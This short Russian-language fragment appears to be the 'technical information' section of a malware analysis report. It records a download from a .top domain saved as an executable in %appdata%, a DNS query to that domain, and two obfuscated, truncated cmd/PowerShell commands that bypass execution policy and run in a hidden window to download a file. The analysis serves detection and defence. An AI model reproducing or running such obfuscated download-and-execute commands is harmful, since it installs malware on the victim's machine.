Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^We^RS^He^Ll.ExE -^eXeCu^tiONpoLi^CY bY^PAS^S^ -^n^o^PRoFI^lE^ -^wi^NdoW^STyLe^ hi^dd^eN (NE^W^-oBJE^c^t ^SYSt^E^m.neT.w^eB^cL^iE^nT).D^OWn^L^OA^df^il^E^('http://toagoores....
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "p^O^We^RS^He^Ll.ExE -^eXeCu^tiONpoLi^CY bY^PAS^S^ -^n^o^PRoFI^lE^ -^wi^NdoW^STyLe^ hi^dd^eN (NE^W^-oBJE^c^t ^SYSt^E^m.neT.w^eB^cL^iE^nT).D^OWn^L^OA^df^il^E^('http://toagoores....' (со скрытым окном)